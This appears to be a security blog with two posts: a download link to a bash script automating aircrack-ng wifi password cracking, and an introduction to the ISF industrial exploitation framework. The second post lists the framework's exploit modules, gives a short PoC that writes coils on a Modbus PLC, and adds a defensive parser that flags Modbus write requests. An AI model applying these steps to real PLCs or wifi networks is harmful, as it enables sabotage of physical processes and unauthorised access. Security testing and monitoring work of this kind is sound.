Thursday, 22 March 2018

Aircrack-ng Automated | Bash Script


image source: www.aircrack-ng.org
Hi,
Got tired of typing commands for cracking wifi passwords in the terminal? Here is my solution. I wanted to reduce the time and effort spent typing commands when using the aircrack-ng suite.
So I wrote a bash script that automates aircrack-ng, which I am going to share with you. You can make any changes to the script you like, although it is working fine as it is.

  1. You just have to download the script.
  2. Make it executable.
  3. Run the script with root privileges.

And just go with the flow.
Remember that you can always ask the owner for the wifi password, or pay for it.

https://drive.google.com/open?id=13DGfJVISL-5tw_XgjPSexqRJE4TflZ5s

As I said, the script can be modified as required. Let me know if you need help.

Thank You.

Thursday, 15 March 2018

Industrial Control System Exploitation Framework




Introduction

ISF (Industrial Exploitation Framework): an exploitation framework written in Python and based on the open source project routersploit. It helps us test for vulnerabilities in multiple programmable logic controllers (PLCs) and Industrial Control System (ICS) software.
Link :- https://github.com/dark-lbp/isf

Modbus : Modbus is a serial communication protocol used to connect industrial electronic devices, popular because it is free and easy to deploy. A Modbus network has one master and one or more slaves. Each slave has a unique 8-bit device address, or unit number.
Coils and registers are names for pre-defined variables at memory addresses. A coil is a boolean (bit) variable and a register is an integer variable. There are discrete inputs (read-only boolean), coils (read-write boolean), input registers (read-only integer), and holding registers (read-write integer).

Requirements

* gnureadline
* requests
* paramiko
* beautifulsoup4
* pysnmp
* python-nmap
* scapy

Exploit modules included in ICSSPLOIT

* s7_300_400_plc_control.py: Siemens S7-300 and S7-400 start/stop.
* vxworks_rpc_dos.py: Works on all VxWorks systems where the Remote Procedure
    Call (RPC) protocol is enabled (CVE-2015-7599).
* quantum_140_plc_control.py: Schneider Quantum 140 series start/stop.
* crash_qnx_inetd_tcp_service.py: Crash a QNX TCP service started with inetd.
* qconn_remote_exec.py: QCONN QNX Neutrino remote command execution
    vulnerability.

Installation

There is a requirements file whose packages can be installed with pip:
pip install -r requirements


PoC

--> Setup a Modbus master and one slave on another machine in the network.

--> Import module
Move to the downloaded isf directory and start python:

from icssploit.clients.modbus_tcp_client import ModbusClient

--> Init Client

target = ModbusClient(name='modbus_tcp_client', ip='<IP>')

eg: target = ModbusClient(name='modbus_tcp_client', ip='192.168.0.115')
target.connect()

The client is now connected to the target Modbus device.

--> Read Coils

target.read_coils(address=<Start Address>, count=<Count Of Coils>)

eg: target.read_coils(address=100, count=10)

This reads the values of the given number of coils, starting at the specified address on the slave.

--> Write Coils

target.write_multiple_coils(address=<Start Address>, values=[<Values To Be Written>])

eg: target.write_multiple_coils(address=100, values=[1, 1, 1, 1, 1, 1, 1, 1])

This changes (writes) the values of the coils starting at the specified address.

Now we can read the coils again to confirm the changes made.
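To make the coil/register model described in the introduction and the read/write calls in this PoC concrete from a monitoring angle, here is an added example. It is my own code, not part of ISF or of this post: it encodes a Read Coils request, decodes Modbus/TCP request frames (MBAP header plus PDU) and lists the requests that write to coils or registers, which is the kind of traffic a defender of a Modbus network wants to see flagged. The byte frames in it are constructed by hand to match the address=100 calls above, and the function-code names are my own labels.

```python
"""Decode Modbus/TCP requests and flag the ones that change coil or register
state. Added example, not ISF code; frames below are constructed by hand."""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# Modbus public function codes for the four data types described above.
READ_COILS, READ_DISCRETE_INPUTS = 0x01, 0x02
READ_HOLDING_REGISTERS, READ_INPUT_REGISTERS = 0x03, 0x04
WRITE_SINGLE_COIL, WRITE_SINGLE_REGISTER = 0x05, 0x06
WRITE_MULTIPLE_COILS, WRITE_MULTIPLE_REGISTERS = 0x0F, 0x10

FUNCTION_NAMES = {  # labels chosen for this example
    READ_COILS: "read_coils", READ_DISCRETE_INPUTS: "read_discrete_inputs",
    READ_HOLDING_REGISTERS: "read_holding_registers",
    READ_INPUT_REGISTERS: "read_input_registers",
    WRITE_SINGLE_COIL: "write_single_coil",
    WRITE_SINGLE_REGISTER: "write_single_register",
    WRITE_MULTIPLE_COILS: "write_multiple_coils",
    WRITE_MULTIPLE_REGISTERS: "write_multiple_registers",
}
WRITE_FUNCTIONS = {WRITE_SINGLE_COIL, WRITE_SINGLE_REGISTER,
                   WRITE_MULTIPLE_COILS, WRITE_MULTIPLE_REGISTERS}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int          # slave / unit identifier from the MBAP header
    function: int
    address: int          # starting coil or register address
    count: int            # number of items read or written
    values: List[int] = field(default_factory=list)  # decoded write payload

    @property
    def is_write(self) -> bool:
        return self.function in WRITE_FUNCTIONS


def build_read_coils_request(transaction_id: int, unit_id: int,
                             address: int, count: int) -> bytes:
    """Encode a Read Coils (0x01) request: MBAP header followed by the PDU."""
    pdu = struct.pack(">BHH", READ_COILS, address, count)
    # The MBAP length field counts the unit id byte plus the PDU.
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def parse_modbus_tcp_request(frame: bytes) -> ModbusRequest:
    """Decode one Modbus/TCP request frame, validating the MBAP header."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, uid = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol identifier must be 0 for Modbus")
    if length != len(frame) - 6:
        raise ValueError("MBAP length does not match frame size")
    pdu = frame[7:]
    fc = pdu[0]
    if fc in (READ_COILS, READ_DISCRETE_INPUTS,
              READ_HOLDING_REGISTERS, READ_INPUT_REGISTERS):
        address, count = struct.unpack(">HH", pdu[1:5])
        return ModbusRequest(tid, uid, fc, address, count)
    if fc in (WRITE_SINGLE_COIL, WRITE_SINGLE_REGISTER):
        address, value = struct.unpack(">HH", pdu[1:5])
        return ModbusRequest(tid, uid, fc, address, 1, [value])
    if fc in (WRITE_MULTIPLE_COILS, WRITE_MULTIPLE_REGISTERS):
        address, count, byte_count = struct.unpack(">HHB", pdu[1:6])
        data = pdu[6:6 + byte_count]
        if fc == WRITE_MULTIPLE_COILS:
            if byte_count != (count + 7) // 8 or len(data) != byte_count:
                raise ValueError("coil byte count inconsistent with quantity")
            # Coil bits are packed least-significant bit first within each byte.
            values = [(data[i // 8] >> (i % 8)) & 1 for i in range(count)]
        else:
            if byte_count != 2 * count or len(data) != byte_count:
                raise ValueError("register byte count inconsistent with quantity")
            values = list(struct.unpack(">%dH" % count, data))
        return ModbusRequest(tid, uid, fc, address, count, values)
    raise ValueError("unsupported function code 0x%02x" % fc)


def try_parse(frame: bytes) -> Optional[ModbusRequest]:
    """Parse a frame, returning None instead of raising on malformed input."""
    try:
        return parse_modbus_tcp_request(frame)
    except (ValueError, struct.error, IndexError):
        return None


def flag_writes(frames: List[bytes]) -> List[str]:
    """One summary line per request that changes device state; reads are ignored."""
    alerts = []
    for frame in frames:
        req = try_parse(frame)
        if req is not None and req.is_write:
            alerts.append("tid=%d unit=%d %s addr=%d count=%d values=%s" % (
                req.transaction_id, req.unit_id, FUNCTION_NAMES[req.function],
                req.address, req.count, req.values))
    return alerts


# Constructed frames mirroring the PoC: read 10 coils at address 100, then
# write eight coils at address 100 to 1 (function 0x0F, one data byte 0xFF).
READ_FRAME = build_read_coils_request(1, 1, 100, 10)
WRITE_FRAME = bytes.fromhex("0002 0000 0008 01 0F 0064 0008 01 FF")

if __name__ == "__main__":
    for line in flag_writes([READ_FRAME, WRITE_FRAME]):
        print(line)
```

Running the block prints a single line for the write frame and nothing for the read, which is the asymmetry a passive monitor on the Modbus segment should care about: reads are routine polling, writes change plant state and should come only from expected masters. The length and byte-count checks are there because a monitor that trusts the MBAP length field blindly can be desynchronised by a truncated or padded frame.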






